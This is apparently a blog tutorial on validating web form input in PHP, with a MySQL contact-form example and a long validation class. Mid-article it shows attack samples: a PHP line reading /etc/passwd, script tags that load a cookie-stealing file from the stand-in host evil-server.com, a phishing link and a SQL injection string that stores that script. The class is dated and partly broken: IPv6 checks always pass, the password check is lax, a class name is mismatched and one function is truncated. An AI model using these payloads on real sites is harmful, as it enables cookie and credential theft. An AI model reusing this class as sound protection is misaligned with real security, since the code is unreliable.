Background
Having worked with web based technologies for the last 10+ years I have seen quite a few things come into play in regards to web applications. SQL injection, Cross-site scripting, session hijacking etc. etc.
I was contracted by Iomega Corporation back in 2000 to assist in performing white & black box testing on a new shopping cart application for their primary website. Load balancing, basic functionality, advanced functionality, etc.
I was able to complete my basic assessment fairly quickly as most of the basic and advanced functionality required nothing more then to test things like adding items to a cart, browsing for more items etc.
Once I was finished with my test cases I began to try other things in regards to base directory traversals, embedding cookie stealing code, and even methods of hijacking authenticated session tokens by emulating the servers session id strings. At the time these attacks all returned positive results indicating a complete lack of input validation on web forms as well as validations on registered users etc.
To rely on an untrusted web application that processes credit card transactions is to say the least very scary.
Validation of input data
One things I learned very early on is to never trust an end-user. That is not to say all end-users are going to be of malicious intent. Validating any and all input vectors on a web based form will account for those users that are visiting with malicious intent.
These days having an automated bot search your website to dynamically test input validation on is more prevalent then ever. In 2000 when I was performing load balancing on the servers functionality creating a simple script to parse the input fields and attempt blind SQL injection attacks was and still is very easy for anyone that has a little bit of time and coding ability. I do believe the kiddies these days are calling things like this 'fuzzing' or testing a site for strange behaviours that may lead to further attacks on the targeted site.
As I said, validating your input is very important and great place to start your research if you are new to web application development.
Lets say you have a simple contact form in which you wish to have users contact you via email. This is a pretty simple HTML form in which your users could submit information to you and is very common on just about every website on the internet.
<form action="contact.php" method="post" class="contact-form">
<fieldset>
<legend>Contact form</legend>
<div>
<input type="text" name="name" />
</div>
<div>
<input type="text" name="email" />
</div>
<div>
<textarea name="comments" /></textarea>
</div>
<div>
<input type="submit" name="send" value="Contact" />
</div>
</fieldset>
</form>
Very simple and basic form to process feedback from a web page. The action argument to this form will send data to the file 'contact.php'. This file could do a variety of things. It could accept the users input and immediately send an email to the administrator of the webpage, it could place this information within a database or it could do both.
Let me show you an example of using this form to place the information within a MySQL database table. First I will show you the table's structure:
CREATE TABLE `feedback` (
`id` int(255) NOT NULL auto_increment,
`date` varchar(25) NOT NULL default '',
`ip` varchar(80) NOT NULL default '',
`port` int(255) NOT NULL default '0',
`name` varchar(45) NOT NULL default '',
`email` varchar(60) NOT NULL default '',
`comment` longtext NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `ip` (`ip`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
Using this type of database structure you can allow easy access to any comments left using the form described above. Emails may be lost but by utilizing a data storage repository you can account for any comments left for your site's administrators.
Now lets say the file 'contact.php' which is specified as the file which will handle the user input does not validate the input prior to displaying the contents in which the user displayed but also attempted to store the information within the database.
Our user decided to embed some code something similar to the following
<?PHP `cat /etc/passwd`; ?>
Ooops, we now have a list of user name's on the server in which we can use widely available tools to guess or brute force user name and password combinations leading to further attacks such as a kernel module which logs keystrokes and emails the results to our anonymous email account.
Now lets say the user simply wants to embed a javascript file hosted on a remote server which can be used to sniff authentication credentials of any other users visiting the contact form.
<?PHP
echo "<script src=\"http://www.evil-server.com/steal-cookies.js\" /></script>";
?>
Or something even more nefarious like sending mass emails to people with a URL like the following.
<a href="http://www.our-server.com/contact.php?<script src=\"http://www.evil-server.com/steal-cookies.js\" /></script>">Click our link for great coupons!</a>
Because the file processing our contact form does not validate any of the global $_GET or $_POST variables they are welcoming all sorts of possible attacks. One of the more serious is something similar to the following in which we actually embed our javascript file residing on our remote server within the database to be openly processed by any user visiting our website.
--;UNION INSERT INTO `feedback` (`comments`) VALUES ('<a href="http://www.our-server.com/contact.php?<script src=\"http://www.evil-server.com/steal-cookies.js\" /></script>">Click our link for great coupons!</a>');
These are some very simple examples which can assist would be attackers from finding weak spots in your web forms. If you are developing any type of web facing form it is in your best interest to validate your input.
That being said here is a class to handle all sorts of input validation. From strings, alpha-numeric string combinations, integers, phone numbers (US), IP addresses, even SQL and XSS validation.
Data validation class
class validation
{
var $data;
var $string;
var $integer;
var $alphachar;
var $money;
var $phone;
var $zipcode;
var $ip_v4;
var $ip_v6;
var $mac_address;
var $domain;
var $hostname;
var $paragraph;
var $password;
var $uri;
var $db;
var $sql;
var $xss;
public function ValidateString( $string )
{
if( ( eregi( "^[a-z]{1,35}$", $string ) ) || ( empty( $string ) ) ) {
$data->string = 0;
} else {
$data->string = -1;
}
return $data->string;
}
public function ValidateInteger( $integer )
{
if( ( eregi( "^[0-9]{1,20}$", $integer ) ) || ( empty( $integer ) ) ) {
$data->integer = 0;
} else {
$data->integer = -1;
}
return $data->integer;
}
public function ValidateAlphaChar( $alphachar )
{
if( ( eregi( "^[0-9a-z_]{1,45}$", $alphachar ) ) || ( empty( $alphachar ) ) ) {
$data->alphachar = 0;
} else {
$data->alphachar = -1;
}
return $data->alphachar;
}
public function ValidateMoney( $money )
{
if( ( eregi( "^[0-9]{1,4}\.[0-9]{2}$", $money ) ) || ( empty( $money ) ) ) {
$data->money = 0;
} else {
$data->money = -1;
}
return $data->money;
}
public function ValidateDecimal( $decimal )
{
if( ( is_numeric( $decimal ) ) || ( empty( $decimal ) ) ) {
$data->decimal = 0;
} else {
$data->decimal = -1;
}
return $data->decimal;
}
public function ValidatePhone( $phone )
{
if( ( eregi( "^[0-9]{3}\-[0-9]{3}\-[0-9]{4}$", $phone ) ) || ( empty( $phone ) ) ) {
$data->phone = 0;
} else {
$data->phone = -1;
}
return $data->phone;
}
public function ValidateZip( $zipcode )
{
if( ( eregi( "^[0-9]{5}$", $zipcode ) ) || ( empty( $zipcode ) ) ) {
$data->zipcode = 0;
} else {
$data->zipcode = -1;
}
return $data->zipcode;
}
public function ValidateIPv4( $ip_v4 = NULL )
{
$ip_v4 = rtrim( $ip_v4 );
if( ( eregi( "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$", $ip_v4 ) ) || ( empty( $ip_v4 ) ) ) {
$data->ip_v4 = 0;
for( $i = 1; $i <= 3; $i++ ) {
if( !( substr( $ip_v4, 0, strpos( $ip_v4, "." ) ) >= "0" && substr( $ip_v4, 0, strpos( $ip_v4, "." ) ) <= "255" ) ) {
$data->ip_v4 = -1;
}
$ip_v4 = substr( $ip_v4, strpos( $ip_v4, "." ) + 1 );
}
if( !( $ip_v4 >= "0" && $ip_v4 <= "255" ) ) {
$data->ip_v4 = -1;
}
} else {
$data->ip_v4 = -1;
}
return $data->ip_v4;
}
public function ValidateIPv6( $ip_v6 )
{
$data->ip_v6 = 0;
return $data->ip_v6;
}
function ValidateEmail( $email )
{
if( ( eregi( "^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,5})$", $email ) ) || ( empty( $email ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateMACFormats( $mac_address = NULL )
{
$mac_address = rtrim( $mac_address );
if( eregi( "^[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}$", $mac_address ) ) {
$data->mac_address = $mac_address;
} elseif( eregi( "^[0-9a-f]{2}\.[0-9a-f]{2}\.[0-9a-f]{2}\.[0-9a-f]{2}\.[0-9a-f]{2}\.[0-9a-f]{2}$", $mac_address ) ) {
$data->mac_address = $this->FixMACAddr( $mac_address );
} elseif( eregi( "^[0-9a-f]{2}\-[0-9a-f]{2}\-[0-9a-f]{2}\-[0-9a-f]{2}\-[0-9a-f]{2}\-[0-9a-f]{2}$", $mac_address ) ) {
$data->mac_address = $this->FixMACAddr( $mac_address );
} elseif( eregi( "^[0-9a-f]{2}\_[0-9a-f]{2}\_[0-9a-f]{2}\_[0-9a-f]{2}\_[0-9a-f]{2}\_[0-9a-f]{2}$", $mac_address ) ) {
$data->mac_address = $this->FixMACAddr( $mac_address );
} elseif( eregi( "^[0-9a-f]{12}$", $mac_address ) ) {
$data->mac_address = $this->FixMACAddr( $mac_address );
} elseif( ( eregi( "^[0-9a-z/-/_]{1,35}$", $mac_address ) ) || ( eregi( "^[0-9a-z]{1,35}$", $mac_address ) ) ) {
$data->mac_address = -1;
} elseif( eregi( "^[0-9a-z%-_:.]{1,45}$", $mac_address ) ) {
$data->mac_address = -1;
} elseif( eregi( "[g-z]", $mac_address ) ) {
$data->mac_address = -1;
} else {
$data->mac_address = -1;
}
return $data->mac_address;
}
public function FixMACAddr( $mac_address = NULL )
{
if( eregi( "^[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}$", $mac_address ) ) {
$data->mac_address = $mac_address;
} elseif( eregi( "^[0-9a-f]{12}$", $mac_address ) ) {
$data->mac_address = str_split( $mac_address, 2 );
$data->mac_address = implode( ':', $data->mac_address );
} elseif( eregi( "^[0-9a-f]{2}\-[0-9a-f]{2}\-[0-9a-f]{2}\-[0-9a-f]{2}\-[0-9a-f]{2}\-[0-9a-f]{2}$", $mac_address ) ) {
$data->mac_address = str_replace( '-', ':', $mac_address );
} elseif( eregi( "^[0-9a-f]{2}\_[0-9a-f]{2}\_[0-9a-f]{2}\_[0-9a-f]{2}\_[0-9a-f]{2}\_[0-9a-f]{2}$", $mac_address ) ) {
$data->mac_address = str_replace( '_', ':', $mac_address );
} elseif( eregi( "^[0-9a-f]{2}\.[0-9a-f]{2}\.[0-9a-f]{2}\.[0-9a-f]{2}\.[0-9a-f]{2}\.[0-9a-f]{2}$", $mac_address ) ) {
$data->mac_address = str_replace( '.', ':', $mac_address );
} elseif( eregi( "[g-z]", $mac_address ) ) {
$data->mac_address = -1;
} elseif( !eregi( "^[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}\:[0-9a-f]{2}$", $mac_address ) ) {
$data->mac_address = -1;
}
return $data->mac_address;
}
public function ValidateDomain( $domain )
{
if( ( eregi( "^[a-z0-9.]+$", $domain ) ) || ( empty( $domain ) ) ) {
if( ( @checkdnsrr( $domain, "A" ) ) || ( $this->ValidateHostname( $domain ) !== -1 ) || ( $this->ValidateIPv4( $domain ) !== -1 ) || ( $this->ValidateHostnameNonRFC( $domain ) !== -1 ) ) {
$data->domain = 0;
} else {
$data->domain = -1;
}
} else {
$data->domain = -1;
}
return $data->domain;
}
public function ValidateParagraph( $paragraph )
{
if( ( eregi( "[ -!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~<>.,]", $paragraph ) ) || ( empty( $paragraph ) ) ) {
$data->paragraph = 0;
} else {
$data->paragraph = -1;
}
return $data->paragraph;
}
public function ValidatePassword( $password )
{
if( ( eregi( "[-!#$%&+.0-9=?A-Z_]", $password ) ) || ( empty( $password ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateDate( $date )
{
if( ( eregi( "[0-9]{4}\-[0-9]{2}\-[0-9]{2} [0-9]{2}\:[0-9]{2}\:[0-9]{2}$", $date ) ) || ( empty( $date ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidatePasswordFields( $password_1, $password_2 )
{
$data = 0;
if( ( $password_1 !== $password_2 ) || ( strcmp( $password_1, $password_2 ) ) ) {
$data = -1;
} else {
if( !eregi( "^[-!#$@%&\'*+\\./0-9=?A-Z^_`a-z{|}~<>]{5,25}$", $password_1 ) ) {
$data = -2;
}
if( ( $password_1 === "************" ) || ( $password_1 === "************" ) ) {
$data = -3;
}
}
return $data;
}
public function ValidateURI( $uri )
{
$prefix = "[[http://]|[https://]]";
$domain = "([a-z0-9][-[:alnum:]]*[[:alnum:]] )(\.[[:alpha:]][-[:alnum:]]*[[:alpha:]] )+";
$dir = "(/[[:alpha:]][-[:alnum:]]*[[:alnum:]] )*";
$page = "(/[[:alpha:]][-[:alnum:]]*\.[[:alpha:]]{3,5})?";
$getstring = "(\?([[:alnum:]][-_%[:alnum:]]*=[-_%[:alnum:]]+)(&([[:alnum:]][-_%[:alnum:]]*=[-_%[:alnum:]]+) )*)?";
$pattern = $prefix . $domain . $dir . $page . $getstring;
if( eregi( $pattern, $uri ) ) {
$data->uri = 0;
} else {
$data->uri = -1;
}
return $data->uri;
}
public function ValidateSQL( $sql, $db )
{
$data = new InputFilter();
$data->sql = $data->safeSQL( $sql, $db );
return $data->sql;
}
public function ValidateXSS( $xss )
{
$data = new InputFilter();
$data->xss = $data->process( $xss );
return $data->xss;
}
function html2txt( $document ) {
$search = array('@
A very simple method of using this class to validate any and all global variables would be something like the following on each page of your web application
// include the class and register a handle
require 'class.validate.php';
$val = new validate;
// copy validated globals to localized variables
$get = array_map($val->ValidateXSS, $_GET);
$post = array_map($val->ValidateXSS, $_POST);
$sess = array_map($val->ValidateXSS, $_SESSION);
$serv = array_map($val->ValidateXSS, $_SERVER);
$req = array_map($val->ValidateXSS, $_REQUEST);
// use the validated copy of our globals
foreach($get as $key => $value) {
echo $key . ' => ' . $value . '<br />';
}
I hope this helps some of you that are just starting out in web application development. Having never went to school for programming it took a lot of research for myself to pull these things together in order to make a somewhat more secure layer within my applications.